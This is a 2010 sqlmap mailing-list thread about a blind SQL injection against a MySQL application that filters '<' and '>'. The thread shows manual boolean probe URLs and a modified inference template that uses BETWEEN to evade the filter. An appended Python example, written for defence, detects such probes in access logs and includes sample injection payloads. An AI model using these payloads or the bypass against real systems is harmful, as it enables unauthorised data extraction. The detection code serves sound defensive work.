Re: [sqlmap-users] blind sql injection problem
From: velky b. <vel...@gm...> - 2010-02-23 10:30:48
Ok, I have resolved the problem. Just brief info for other users: If characters like '<' or '>' are filtered, it is possible to modify the query like this:

    <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>

vb

On Sat, Feb 20, 2010 at 6:38 PM, velky brat <vel...@gm...> wrote:
> Hello,
> I have found blind SQL injection in the GET parameter of audited MySQL
> application (also sqlmap is able to identify the injection), but it is not
> possible to dump any data (like --current-user or --current-db). The only
> option which is working is --fingerprint (gives correct result of MySQL 5
> version); all other options gave the same result as "None".
> Because it looked strange to me, I made some basic tests manually with
> the following results:
>
>
> http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
> http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
>
> http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
> http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE)
>
> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE
>
> As you can see from these results, it looks like the characters "<" and ">"
> are filtered within the application.
>
> However, the injection is still working. I suppose that sqlmap uses these
> characters ("<", ">") really often during dumping of data from the database.
> So I have changed the following line in the mysql section of the queries.xml file:
>
> original line:
> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
>
> updated line:
> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>
> Unfortunately, the result was the same (None). What else should be modified?
>
> Is it possible to use the BETWEEN statement instead of ">" in the current
> version of sqlmap?
> Is it already supported somehow in sqlmap, or would it appear in future
> versions?
>
> Thank you in advance
>
> vb
>
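The thread shows why stripping '<' and '>' from a parameter is not a defence: BETWEEN carries the same yes/no information. The following is an added example, not code from the thread or from sqlmap, that flags boolean-comparison probes in combined-format access logs whether or not they use angle brackets, and checks the equivalence that makes the filter pointless. The log format and the sample lines are assumptions (constructed to mirror the tests posted above).

```python
# Added example (not from the thread or sqlmap): flag boolean-based blind
# SQLi probes in access logs, including comparison forms without '<' or '>'.
# Assumes Apache/Nginx combined log lines; SAMPLE_LOG below is constructed.
import re
from urllib.parse import unquote_plus

# Any of these turns an injected expression into a yes/no oracle. Blocking
# '<' and '>' removes only the first alternative; BETWEEN (as in the thread)
# and the others leak exactly the same information.
COMPARISON = re.compile(
    r"\bAND\b[^&]*?(?:[<>]=?|\bBETWEEN\b[^&]*\bAND\b|\bLIKE\b|\bIN\s*\()",
    re.IGNORECASE,
)
# Per-character extraction functions of the kind used in inference templates.
CHAR_INFERENCE = re.compile(
    r"\b(?:ORD|ASCII)\s*\(\s*(?:MID|SUBSTR(?:ING)?)\s*\(", re.IGNORECASE
)
LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify(log_line):
    """Return (decoded_path, findings) for one access-log line."""
    m = LOG_RE.search(log_line)
    if not m:
        return None, set()
    path = unquote_plus(m.group(1))  # match on the decoded text, not the raw URL
    findings = set()
    if COMPARISON.search(path):
        findings.add("boolean_comparison")
    if CHAR_INFERENCE.search(path):
        findings.add("char_inference")
    if "<" in path or ">" in path:
        findings.add("angle_brackets")  # the only thing a '<'/'>' filter sees
    return path, findings

def between_is_complement_of_gt(n):
    """MySQL 'x BETWEEN 0 AND n' is inclusive, so over byte values 0..255 it is
    exactly NOT (x > n): the filtered and unfiltered forms ask the same question."""
    return all((0 <= x <= n) == (not x > n) for x in range(256))

SAMPLE_LOG = [  # constructed lines mirroring the manual tests in the thread
    '10.0.0.5 - - [20/Feb/2010:18:38:01 +0100] "GET /index.php?id=9 HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Feb/2010:18:38:02 +0100] "GET /index.php?id=9%20AND%206%20%3E%205 HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Feb/2010:18:38:03 +0100] "GET /index.php?id=9%20AND%206%20BETWEEN%200%20and%2010 HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Feb/2010:18:38:04 +0100] "GET /index.php?id=9%20AND%20ORD(MID((user()),1,1))%20BETWEEN%200%20AND%2064 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line))
```

Only the second sample line would be caught by a filter on angle brackets; the third and fourth carry the same oracle and pass it untouched.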